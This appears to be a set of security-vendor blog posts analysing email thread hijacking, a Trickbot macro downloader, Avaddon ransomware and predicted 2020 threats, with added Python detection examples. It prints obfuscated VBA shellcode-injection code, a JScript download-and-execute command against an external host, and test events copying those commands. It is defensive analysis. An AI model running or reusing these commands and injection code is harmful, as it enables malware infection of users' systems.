Email Conversation Thread Hijacking

Summary

“You should only open email attachments and links from senders you know” is a common piece of advice when it comes to preventing email-based malware and phishing attacks. However, in this article we outline an attack technique called email conversation thread hijacking, which uses the victims’ existing email conversations, and thus their trust relationships, to spread to new victims. Against this attack the previous advice will not help. We explain how email conversation thread hijacking is used by attackers, and why it dramatically increases the likelihood that victims open malicious links or malicious attachments.

Background

Malicious actors try to get victims to open malicious links or malicious attachments. To this end, they often mimic genuine emails, such as invoices. However, if a victim is not a customer of a particular company or service, they will likely not open invoices claiming to be from that company or service, especially knowing that this is the most common scheme malicious actors use to lure victims into executing their malware. Malicious actors therefore also often use current events to spark victims’ interest in opening their malicious links or malicious attachments. Examples of such events are Christmas, Black Friday, Halloween and Valentine’s Day, but currently also the SARS-CoV-2 pandemic. However, users are often aware of these schemes as well and do not open malicious links or malicious attachments, especially when they arrive out of the blue without any context.

Hence, more and more attackers are leveraging a technique called email conversation thread hijacking, also known as email reply chain attack or email thread hijacking. In this technique, an attacker uses existing email conversations of victims to spread to new victims. Previously, attackers only used the email addresses listed in victims’ address books. Email conversation thread hijacking also uses the victims’ existing past email conversation threads to spread to new victims. To this end, the attackers reply to the conversations the victim has in their mailbox.

How does email conversation thread hijacking work?

An email thread hijacking attack begins when a first victim is compromised. Next, their emails and often email login credentials are stolen. The attackers will then reply to the victim’s emails with their malicious messages.

In the following example, the “From” field contains the victim’s email address. The “To” field contains the email address of the targeted user, with which the victim had an email conversation previously. The “Subject” contains the original subject of the email conversation but is prepended with a “Re: “. The quote below the message contains the entire email conversation the two parties had.

Email conversation thread hijacking example

Skilled attackers also adapt the language of the reply to that of the hijacked email conversation, e.g., the following example uses a German-language reply:

Email conversation thread hijacking example

While in the previous examples the malicious reply email contained a malicious link, these emails can also use malicious attachments:

Email conversation thread hijacking example

How effective is email conversation thread hijacking?

To demonstrate how effective email conversation thread hijacking is, we recreated a real email exchange that we observed during a routine false-positive email inspection:

Email conversation thread hijacking example

In this example, the attackers compromised Joe Schmoe’s email account and replied to an email that Joe had previously received from Alice. They replied with a malicious link (OPEN THE DOCUMENT) and some generic text. Alice released the email from quarantine and tried to open the malicious link, but her browser saved her from getting infected. She subsequently replied to Joe’s compromised email account that she can’t open “the file” and asked whether “the file” could be sent in a different format. The attackers then sent Alice another malicious link. While we are certain that the attackers hijacking an already hijacked email conversation thread a second time was a coincidence, this example clearly shows how effective email conversation thread hijacking can be.

Fortunately, no attacker tailors their reply emails to fit into the hijacked conversation (yet). However, since threat actors have highly automated email conversation thread hijacking attack tools, the chances that the hijacked conversation involves documents that are shared back and forth are high. And even if it does not, who wouldn’t open a document sent by a known contact within an existing email conversation?
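As an added example (not code from the original article), the following Python heuristic scores a reply for the pattern described above: a “Re:” subject, a quoted conversation below the message, and a short generic new part that carries a link or an attachment. The two .eml samples are constructed, modelled on the Joe/Alice exchange, with example.* placeholder addresses and a placeholder URL.

```python
import email
import re
from email import policy

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Start of the quoted thread: '>' lines or an English/German attribution line.
QUOTE_MARK_RE = re.compile(r"^(On .+ wrote:|Am .+ schrieb .+:)$")
LURE_RE = re.compile(r"\b(open|view|download) the (document|file|attachment)\b", re.I)


def split_reply(body):
    """Return (new_text, quoted_thread): everything from the first quote marker on
    is treated as the quoted conversation the attacker replied to."""
    new, quoted, in_quote = [], [], False
    for line in body.splitlines():
        if not in_quote and (line.startswith(">") or QUOTE_MARK_RE.match(line.strip())):
            in_quote = True
        (quoted if in_quote else new).append(line)
    return "\n".join(new).strip(), "\n".join(quoted).strip()


def score_reply(raw):
    """Signals for a hijacked-thread reply; 'suspicious' is set when all core
    signals fire. This is a triage heuristic, not a replacement for link and
    attachment scanning (which is what actually catches the payload)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = msg.get("Subject", "")
    part = msg.get_body(preferencelist=("plain",))
    text = part.get_content() if part is not None else ""
    new, quoted = split_reply(text)
    urls = URL_RE.findall(new)
    attachments = [p.get_filename() for p in msg.iter_attachments()]
    signals = {
        "reply_subject": subject.strip().lower().startswith("re:"),
        "quoted_thread": bool(quoted),
        "short_new_text": len(new.split()) <= 30,      # generic one-liner, not a real answer
        "payload_in_new_text": bool(urls or attachments),
        "lure_phrase": bool(LURE_RE.search(new)),
        "urls": urls,
    }
    core = ("reply_subject", "quoted_thread", "short_new_text", "payload_in_new_text")
    signals["suspicious"] = all(signals[k] for k in core)
    return signals


# Constructed sample: a hijacked thread, as in the Joe Schmoe / Alice example.
HIJACKED_REPLY = b"""From: Joe Schmoe <joe.schmoe@example.com>
To: Alice <alice@example.org>
Subject: Re: Q2 contract draft
Content-Type: text/plain; charset=utf-8

Hi Alice,

OPEN THE DOCUMENT: http://document-share.example.net/view?id=PLACEHOLDER

Regards
Joe

On Mon, 1 Jun 2020 09:12:00 +0200, Alice wrote:
> Hi Joe,
> please find the updated contract draft below, let me know what you think.
> Alice
"""

# Constructed sample: a genuine reply in the same thread (long, specific, no payload).
BENIGN_REPLY = b"""From: Joe Schmoe <joe.schmoe@example.com>
To: Alice <alice@example.org>
Subject: Re: Q2 contract draft
Content-Type: text/plain; charset=utf-8

Hi Alice,

thanks, I went through sections 2 and 4 and added comments on pricing and the
delivery schedule. Section 3 still needs the revised liability wording from
legal; I will forward it as soon as I have it.

Regards
Joe

On Mon, 1 Jun 2020 09:12:00 +0200, Alice wrote:
> Hi Joe,
> please find the updated contract draft below, let me know what you think.
> Alice
"""
```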

Who uses email conversation thread hijacking?

The number of threat actors using email reply chain attacks keeps increasing. First observed in May 2017 in a limited targeted spear-phishing campaign, the technique was adopted by many commodity threat actors in 2018.

In 2019, Emotet also adopted email conversation thread hijacking. To this end, its operators added an email-stealing module. The module steals emails and login credentials from victims and sends them to Emotet’s C2 servers, which distribute them to the systems of other victims infected with Emotet’s spam module, where they are used in attacks against new victims. Recently, Emotet has enhanced its email reply hijacking technique by also stealing attachments from victims and placing its malicious attachment among the stolen benign attachments so that the email appears even more legitimate.

QakBot is also frequently distributed via replies to existing email conversation threads. In 2020, the Valak malware started to be distributed via email thread hijacking, too.

Hornetsecurity has observed an increase in compromised accounts being used to send malicious emails. While some do not (yet) use email conversation thread hijacking and simply misuse victims’ email accounts to send emails, with access to a victim’s email account it is trivial to perform email reply chain attacks: a threat actor simply has to reply to emails the victim has received. We are therefore certain that the trend towards email thread hijacking attacks will continue. Therefore, users can no longer rely on a known, trusted sender when deciding whether it is safe to open attachments or links.

Conclusion and Countermeasure

The advice to only open email attachments and links from known senders is outdated. With email conversation thread hijacking, even commodity threat actors can automate highly sophisticated and effective spearphishing emails. Often victims are not aware that they are compromised. In such cases it is important to inform victims that they are spreading malicious content via email so they can take measures against the compromise. Immediate actions should be to change the email login credentials. Secondary steps would be to determine how the attackers gained access to the email account in the first place to prevent such incidents in the future.

For humans it is very difficult, if not impossible, to spot email conversation thread hijacking because, being sent from a legitimate but compromised account, the emails are – apart from the writing style – indistinguishable from real, legitimate emails. However, email filters that inspect the attachments or links in emails can detect malicious content regardless.

Hornetsecurity’s Spam and Malware Protection, with the highest detection rates on the market, detects and quarantines threats regardless of whether they use email reply chain attacks or not. Hornetsecurity’s Advanced Threat Protection is likewise not affected by email conversation thread hijacking and inspects email contents regardless of whether they were sent from a compromised account or not. Hornetsecurity’s malware, phishing and ATP filters take precedence over sender allow lists. This way, even if an allow-listed sender gets compromised and their email account is misused to send malicious emails, Hornetsecurity customers are protected.

Trickbot Malspam Leveraging Black Lives Matter as Lure

Summary

The Hornetsecurity Security Lab has observed a malspam campaign distributing Trickbot [1] that uses the Black Lives Matter movement as a lure to entice victims to open a malicious attachment. The Trickbot downloader document first injects shellcode into the WINWORD.EXE process. That shellcode then spawns a cmd.exe process into which it again injects the same shellcode. This cmd.exe process then downloads the Trickbot DLL and executes it via rundll32.exe.

Background

The initial emails claim to be from the State office, Country authority, or Country administration:

Trickbot initial email.

The email tells the recipient they can Vote confidentially about "Black Lives Matter" or Tell your government your opinion, Give your opinion, and Speak out confidentially about "Black Lives Matter".

Attached is a file named e-vote_form_0000.doc, further suggesting that the email relates to some sort of official vote.

However, the document only displays an image announcing a fake Office update and instructions to “Enable Editing” as well as to “Enable Content”:

Trickbot document.

If the instructions are followed the malicious VBA macro in the document is executed and downloads the Trickbot malware.

Technical Analysis

The initial portion of the infection chain until the Trickbot malware is deployed is depicted in this flow chart:

Trickbot initial infection chain.

In the following analysis we will walk through each stage of this chain.

VBA macro

The VBA macro is protected against viewing in Word:

Trickbot protected macro.

However, this “protection” only prevents Word from showing the VBA macro without a password. The VBA macro code is still accessible.

The first thing the VBA macro does is display a fake error message:

Private Sub Document_Open()
    MsgBox "Error #80013123"   ' fake error pop-up shown before anything else happens
    ' [...] shellcode decoding and injection follow (see below)
End Sub

This results in the following pop up:

Trickbot fake error message

This is likely an attempt to probe for user interaction to bypass sandbox detections. It could also be an attempt to cover up that there is no document. A victim may be satisfied by receiving this error and assuming the document is broken.

The macro will use VirtualProtectEx and CreateThread to inject shellcode into the WINWORD.EXE process. To this end, the code assembles one large string:

    uriSubscriber = "i-j-[...]-a-a-a-"
    uriSubscriber = uriSubscriber & "i-l-[...]-a-a-"
    uriSubscriber = uriSubscriber & "g-k-a-a-p-p-h-f-p-i-[...]-o-g-c-c-p-k-h-c-g-j-h-d"

This string contains the encoded shellcode. It is then decoded via the following function:

    Dim f() As Byte
    ' Each token is "x-" (2 chars) but two tokens form one byte, so Len/2 - 1
    ' over-allocates: only the first half of f() is filled, the rest stays zero
    ReDim f(0 To Len(uriSubscriber) / 2 - 1) As Byte
    Dim sSmart As Long, regOptimize As Long
    Dim destEnd As Variant
    ' Every "-"-separated token is a single letter a..p; letter minus "a" is a nibble
    For Each destEnd In Split(uriSubscriber, "-")
        If sSmart Mod 2 Then
            ' odd token: low nibble, added to the byte already holding the high nibble
            regOptimize = sSmart - 1
            regOptimize = regOptimize / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) + f((sSmart - 1) / 2)
        Else
            ' even token: high nibble, shifted left by four bits
            regOptimize = sSmart / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) * 16
        End If
        sSmart = sSmart + 1
    Next
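As an added example (not code from the article or from the malware), a Python re-implementation of the decoding loop above for use during analysis, together with the observation that the scheme is plain hex with a shifted a..p alphabet. The sample string is constructed; only its leading “i-j” pair is taken from the document’s string.

```python
def is_well_formed(encoded):
    """True when every '-'-separated token is exactly one letter in a..p.
    A trailing '-' yields an empty token, on which the macro's Asc() would fail."""
    return all(len(t) == 1 and "a" <= t <= "p" for t in encoded.split("-"))


def decode_dash_letters(encoded):
    """Re-implementation of the macro's decoding loop: letter minus 'a' is a
    nibble (a=0 ... p=15); even-indexed tokens supply the high nibble (* 16),
    odd-indexed tokens add the low nibble to the byte the previous token wrote."""
    if not is_well_formed(encoded):
        raise ValueError("malformed token stream")
    out = bytearray()
    for i, tok in enumerate(encoded.split("-")):
        nibble = ord(tok) - ord("a")
        if i % 2 == 0:
            out.append(nibble * 16)   # Else branch of the macro: high nibble
        else:
            out[-1] += nibble         # If branch: low nibble into the same byte
    return bytes(out)


# The same mapping seen as hex with a shifted alphabet: a..p -> 0..f.
_ALPHABET = str.maketrans("abcdefghijklmnop", "0123456789abcdef")


def decode_as_shifted_hex(encoded):
    """Equivalent one-liner; needs an even number of tokens, since bytes.fromhex
    rejects a dangling nibble that the macro would silently keep as a half byte."""
    return bytes.fromhex(encoded.replace("-", "").translate(_ALPHABET))


def encode_dash_letters(data):
    """Inverse mapping, used here only to build a constructed test vector."""
    return "-".join(chr(ord("a") + n) for b in data for n in (b >> 4, b & 0x0F))


# Constructed sample: the document's string starts with "i-j-", which is 0x89.
SAMPLE = "i-j-" + encode_dash_letters(b"\x00\xff\x10 constructed")
```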

Last but not least, the memory holding the decoded shellcode is set to PAGE_EXECUTE_READWRITE using VirtualProtectEx, which was previously aliased to extensionsComment, and then a thread is started with the address of the shellcode as its start address using CreateThread, which has been aliased to sMail:

    ' VirtualProtectEx(hProcess, lpAddress, dwSize, flNewProtect, lpflOldProtect)
    Private Declare Function extensionsComment Lib "kernel32" Alias "VirtualProtectEx" ( _
        iMail As Long, _
        bConsole As Long, _
        regFunction As Long, _
        tablePosition As Long, _
        colMail As Long) As Long
    ' CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId)
    Private Declare Function sMail Lib "kernel32" Alias "CreateThread" ( _
        textTimer As Long, _
        uriMail As Long, _
        m As Long, _
        dateMembers As Long, _
        textTimer0 As Long, _
        lServer As Long) As Long
[...]
    sConsole = destN_ - angleTexture + UBound(f)   ' size of the region to make executable
    q = extensionsComment(ByVal ipFunction, ByVal angleTexture, ByVal sConsole, ByVal PAGE_EXECUTE_READWRITE, ByVal VarPtr(extensionsComment0))   ' mark shellcode RWX
    adsLogon = sMail(ByVal 0&, ByVal 0&, ByVal destN_, ByVal 2&, ByVal 0, ByVal 0&)   ' thread start address = shellcode
    adsScr 5000

The shellcode can most easily be extracted by breaking on CreateThread in a debugger:

Trickbot shellcode extraction via x64dbg.

Shellcode WINWORD.EXE

The shellcode running in the WINWORD.EXE process first resolves several library functions. It then uses CreateProcessA to run cmd.exe with the pause command, causing the cmd.exe process to idle:

Trickbot shellcode spawning cmd.exe with pause command

Next, the shellcode uses a classic OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread sequence to do shellcode injection into the paused cmd.exe process:

Trickbot shellcode injection into cmd.exe process.

The cmd.exe /c pause process is likely used to evade detection of process creation with the CREATE_SUSPENDED flag, a technique that is usually used to start a process in the suspended, i.e., paused, state, inject code into it, and then resume it.

The injected shellcode is the same shellcode that was injected into the WINWORD.EXE process; however, the entry point passed to CreateRemoteThread is different, resulting in a different execution flow for the shellcode within the cmd.exe process.

Shellcode cmd.exe

The shellcode in the cmd.exe process will also resolve several library functions. Additionally, it will decode the Trickbot download URLs.

Next, the shellcode will query GetSystemMetrics(SM_CXSCREEN) and GetSystemMetrics(SM_CYSCREEN) to get the display resolution. Then GetCursorPos is queried twice, with a call to Sleep(0x1388) in between causing a 5 second delay.

Trickbot profiling the system.

This is likely done to verify mouse movement and avoid sandboxes.

The data is then encoded as an HTTP query string as follows: &scr=1280x1024&cur1=604x250&cur2=622x310

The download URLs are appended with an ID query string &id=00000000 and the above system metrics query string, forming the final download URL, which is then requested via InternetOpenUrlA:

Trickbot using InternetOpenUrlA to download.

In case the download is successful, the downloaded file is written to C:\Users\<username>\AppData\Local\system.rre and executed via rundll32.exe %userprofile%/system.rre,Initialize using ShellExecuteA. The system.rre file is the Trickbot DLL.

In case the download is not successful the downloader sleeps and then a second download URL is tried.
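As an added example (not from the article), a Python check for the download-request format just described, run over constructed proxy log lines; the host names are placeholders, while the path and query-string pattern follows the IOC section of this article. A request whose cur1 and cur2 values are identical means the cursor did not move between the two GetCursorPos calls, which is what a sandbox without interaction would send.

```python
import re
from urllib.parse import parse_qs, urlsplit

RES_RE = re.compile(r"^\d{3,4}x\d{3,4}$")          # WxH, e.g. 1280x1024
REQUIRED = ("omz", "pic", "id", "scr", "cur1", "cur2")


def classify_url(url):
    """Match one URL against the downloader's request format:
    .../may.php?omz=1&pic=b&id=<8 digits>&scr=WxH&cur1=XxY&cur2=XxY."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    match = (
        parts.path.endswith("/may.php")
        and all(k in q for k in REQUIRED)
        and q["omz"] == "1" and q["pic"] == "b"
        and re.fullmatch(r"\d{8}", q["id"]) is not None
        and all(RES_RE.match(q[k]) for k in ("scr", "cur1", "cur2"))
    )
    return {
        "match": match,
        "cursor_moved": bool(match and q["cur1"] != q["cur2"]),
        "client_id": q.get("id"),
    }


def scan_proxy_log(text):
    """One hit per matching line; expected fields: time client method url status."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        info = classify_url(fields[3])
        if info["match"]:
            hits.append({"time": fields[0], "client": fields[1], "status": fields[4], **info})
    return hits


# Constructed proxy log; *.invalid / *.test hosts are placeholders, not the real IOC domains.
PROXY_LOG = """\
2020-06-10T10:01:02Z 10.0.0.15 GET https://cdn.example-benign.test/assets/app.js 200
2020-06-10T10:01:09Z 10.0.0.15 GET https://host1.invalid/may.php?omz=1&pic=b&id=12345678&scr=1280x1024&cur1=604x250&cur2=622x310 200
2020-06-10T10:01:15Z 10.0.0.22 GET https://host2.invalid/wp-content/themes/processing/may.php?omz=1&pic=b&id=00000000&scr=1024x768&cur1=512x384&cur2=512x384 404
2020-06-10T10:02:00Z 10.0.0.30 GET https://shop.example-benign.test/search?id=12345678&q=may 200
"""
```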

Conclusion and Remediation

The double shellcode injection is likely used to evade behavioral detection, as WINWORD.EXE usually does not download files from the Internet nor execute rundll32.exe. Hence, such anomalous behavior is more likely to be detected than cmd.exe spawning the rundll32.exe process. The query for the system’s display resolution as well as the double query of the cursor position is also likely done to avoid delivering the Trickbot DLL to sandbox systems.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detected and blocked the malicious Trickbot document based on a detection signature.

Had the basic detection signatures not blocked the emails, Hornetsecurity’s Advanced Threat Protection (ATP) would not have been affected by the various anti-sandbox mechanisms either. The human interaction simulation of the ATP sandbox successfully clicks the fake error message away, allowing a complete execution of the malicious document:

Hornetsecurity Advanced Threat Protection sandbox clicking button

It detects the processes being created by the document, as well as the process injections:

Hornetsecurity Advanced Threat Protection sandbox detecting process injection

The human interaction simulation also causes the two queried cursor positions, sent as cur1 and cur2 to the Trickbot download server, to differ:

Hornetsecurity Advanced Threat Protection sandbox Internet connection

This way Hornetsecurity’s ATP sandbox is not fooled by the various anti-sandbox techniques.

References

Indicators of Compromise (IOCs)

Hashes

SHA256 Filename Description
d6a44f6460fab8c74628a3dc160b9b0f1c8b91b7d238b6b4c1f83b3b43a0463d e-vote_form_1967.doc Trickbot downloader document

URLs

  • hxxps[:]//ppid.indramayukab.go[.]id/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}
  • hxxps[:]//www.inspeclabeling[.]com/wp-content/themes/processing/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}

DNSs

  • ppid.indramayukab.go.id
  • www.inspeclabeling.com
Avaddon: From seeking affiliates to in-the-wild in 2 days

Summary

On 2020-06-03 it was reported [1] that a new ransomware calling itself Avaddon was seeking partners for its affiliate program, i.e., people installing the ransomware on victim systems. Just two days later, on 2020-06-05, malspam distributing the Avaddon ransomware was observed.

This article briefly outlines the first wave of malspam distributing Avaddon ransomware as observed by Hornetsecurity’s Security Lab.

Background

The initial email of the Avaddon ransomware uses a lure pretending to be an image:

Initial email

The attached ZIP archive contains a JScript file that, upon execution, downloads and executes the Avaddon ransomware binary:

Content of ZIP

Technical Analysis

In the following we analyze the malicious email, the JScript downloader, and last but not least the downloaded Avaddon ransomware binary.

Emails

Emails are sent from <name>[0-9]{2}@[0-9]{4}.com sender email addresses. Most of these four-digit .com domains ([0-9]{4}.com) are parked domains without any SPF records; hence, blocking on policy grounds is not possible.

The malspam distributing Avaddon ransomware started on 2020-06-04 at around 14:00:00 UTC and was still ongoing at the time of writing:

Avaddon ransomware malspam wave timeline

The observed wave seems to target CA (Canada):

Avaddon ransomware wave recipient countries

The recipient industries seem to indicate a focus on educational institutions at the receiving end of this wave:

Avaddon ransomware wave recipient industries

However, because this is only data from the first wave this should not be interpreted as the final targeting of the Avaddon ransomware.

JScript Downloader

The IMG000000.jpg.js.zip attachment contains the IMG000000.jpg.js JScript downloader:

Avaddon IMG000000.jpg.js JScript downloader

The Avaddon downloader script is simply:

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp[:]//217.8.117[.]63/sava[.]exe','%temp%\\5203508738.exe');Start-Process '%temp%\\5203508738.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp[:]//217.8.117[.]63/sava[.]exe %temp%\\237502353.exe&start %temp%\\237502353.exe", false);

It uses both PowerShell and the BITSAdmin tool to download the sava.exe Avaddon ransomware file to %temp%\5203508738.exe and %temp%\237502353.exe respectively, and executes it:

Avaddon ransomware downloader process tree
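As an added detection example (not the article’s code), the following Python rules flag both launch paths of this downloader in process-creation telemetry: a script host (wscript.exe) spawning cmd.exe whose command line downloads with PowerShell’s WebClient or with bitsadmin /transfer and then starts an executable from %temp%. The events are constructed; 203.0.113.5 is a documentation-range placeholder, not the real download host.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
RULES = [
    ("powershell_webclient_download",
     re.compile(r"powershell.*downloadfile\(", re.I)),
    ("bitsadmin_transfer_download",
     re.compile(r"bitsadmin\s+/transfer\b.*\s/download\b", re.I)),
    # "start %temp%\x.exe" / "Start-Process '%temp%\x.exe'" (or an expanded ...\Temp\ path)
    ("execute_from_temp",
     re.compile(r"(start-process|\bstart)\s+'?(%temp%|[^\s']*\\temp\\)[^\s']*\.exe", re.I)),
]


def analyze_event(event):
    """Verdict for one process-creation event: alert when a script host launches
    cmd.exe that both downloads a file and executes something from %temp%."""
    cmd = event["cmdline"]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    fired = [name for name, rx in RULES if rx.search(cmd)]
    downloads = [n for n in fired if n != "execute_from_temp"]
    alert = parent in SCRIPT_HOSTS and bool(downloads) and "execute_from_temp" in fired
    return {"alert": alert, "parent": parent, "rules": fired, "urls": URL_RE.findall(cmd)}


def scan(events):
    """All alerting events, for feeding into a case or a block list of download URLs."""
    return [r for r in map(analyze_event, events) if r["alert"]]


# Constructed events modelled on the two jsRun.Run() calls above (not real telemetry).
EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient)"
                ".DownloadFile('http://203.0.113.5/sava.exe','%temp%\\5203508738.exe');"
                "Start-Process '%temp%\\5203508738.exe'"},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c bitsadmin /transfer getitman /download /priority high "
                "http://203.0.113.5/sava.exe %temp%\\237502353.exe&start %temp%\\237502353.exe"},
    # benign admin activity: same tools, no script-host parent, no execution from %temp%
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c bitsadmin /list"},
    {"parent": r"C:\Program Files\Updater\updater.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c PowerShell -File C:\\Scripts\\inventory.ps1"},
]
```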

Avaddon Ransomware sava.exe

The Avaddon ransomware executable is not packed. However, its strings appear to be Base64 encoded using a custom alphabet. Imports are freely accessible. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted with a key that was previously imported from the ransomware binary:

Avaddon ransomware generating AES key

Furthermore, the Avaddon ransomware deletes the volume shadow copies via wmic.exe SHADOWCOPY /nointeractive and vssadmin.exe Delete Shadows /All /Quiet.

After encryption the Avaddon ransomware changes the desktop background notifying the victim that files have been encrypted and where the instructions to pay the ransom are located:

Avaddon ransomware desktop background

The Avaddon ransomware leaves a file named [0-9]+-readme.html in every directory it encrypts. This file contains the instructions and an .onion link to the ransomware panel:

Avaddon ransomware ransom note

Victims are expected to enter their ransom ID on the linked .onion Tor hidden service website to receive further instructions on how to pay the ransom and obtain a decrypter.

Conclusion and Remediation

As this example shows, collaboration in the malware underground can speed up the proliferation and distribution of new ransomware.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detects and blocks the outlined threat. Hornetsecurity’s Advanced Threat Protection extends this protection by also detecting yet unknown threats.

References

Indicators of Compromise (IOCs)

Hashes

SHA256 Filename Description
05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2 sava.exe Avaddon ransomware

URLs

  • hxxp[:]//217.8.117[.]63/sava[.]exe
Top 5 Cyberthreats in 2020

We asked Dr. Yvonne Bernard, Head of Product Management, to give us expert advice on the cyberthreats we should have on our radar in 2020.

Being asked to predict the next big threats will always be contradictory: on the one hand, I have access to big data analysis tools that make predictions possible at a great level, and our own security lab gives me all kinds of technical details. On the other hand, predictions also require a combination of intuition, experience and self-confidence … But it is a great opportunity to warn people just by looking into your crystal ball, and I am willing to take on the task.
Yvonne Bernard giving a talk
My general assumption is that email remains the number one attack vector, especially for the kind of business customers we protect every day. That said, my first prediction may surprise you:

1. Hacked IoT devices

I expect attacks on IoT devices to increase further in 2020. These devices are cheap and even useful in an Industry 4.0 or digitalisation scenario. They often lack patch management and are based on standard open operating systems with well-known default users or admins (e.g. openHAB for Raspberry Pi). What worries me in such an environment is that it is not just a Chinese hacker switching off your coffee machine: these millions of easily hacked devices with different IPs worldwide are the perfect breeding ground for botnets such as Reaper. DDoS and other large-scale global attacks run through many small or large companies or through critical infrastructures, by making use of hacked IoT devices worldwide, at no cost.

2. Big data exfiltration attacks with Ransomware as a Service

We have seen Ransomware as a Service before: people without any programming or hacking skills can build their own malware. Malware construction kits such as Philadelphia (sold for $389) or the currently active Satan (via a revenue-share earning model) are some examples.

This and similar simple malware attacks can increase the attacks on SMEs, because it is now cheaper and easier than ever. Being a small company does not mean you are not a potential victim of cybercrime, but unfortunately being a large company does not mean that either.

We see first indications that data exfiltration attacks based on ransomware will increase strongly. The last big ransomware extortion trend, written to encrypt data and blackmail the victim into paying to obtain the decryption key, is still active … but data exfiltration is growing fast: instead of tampering with the data, the data is stolen and moved to an external storage. Attackers (sometimes they even prove possession of the data) then threaten to publish it if you do not pay. Stolen data can be private data as well as intellectual property, trade secrets or customer data. This trend is fairly new, but is expected to grow quickly.

3. AI-enhanced malware

The use of AI for cyberattacks will increase: deepfakes, e.g. to fool even new voice recognition, have already been seen, as have various techniques to improve the targeting of attacks. One of the most important AI-based threats is malware becoming host-system aware:

New AI-enhanced malware can assess the system on which it is installed, mainly which operating system it uses and what its vulnerabilities are. It then learns about the patch status of the system. Based on the vulnerabilities found on the infected host, AI-enhanced malware downloads targeted modules from the command and control servers. The malware already knows that the downloaded modules will succeed in execution, because they are designed to use the detected vulnerabilities of the host system.

4. Smart phishing

Phishing emails are becoming smarter, more realistic and more automated. The number of hard-to-assess phishing emails in inboxes will therefore increase. As an example, many social networks offer APIs that allow hackers to take Business Email Compromise to a whole new level, both realistic and effortless, fully automated. Again, this scale of realistic attacks can affect companies of any size.

5. Malware with encrypted hidden attachments

Since mid-2019 we have noticed an increase in the number of encrypted attachments in which malware was hidden, and this is still growing. This sounds very abstract and unlikely, but imagine you work in the human resources department and receive an email with an application for a vacancy you posted on Indeed. The applicant writes a perfectly fitting cover letter and their CV is attached as a PDF that can be opened with the password “yourjoboffer2020!”. Would you fall for it?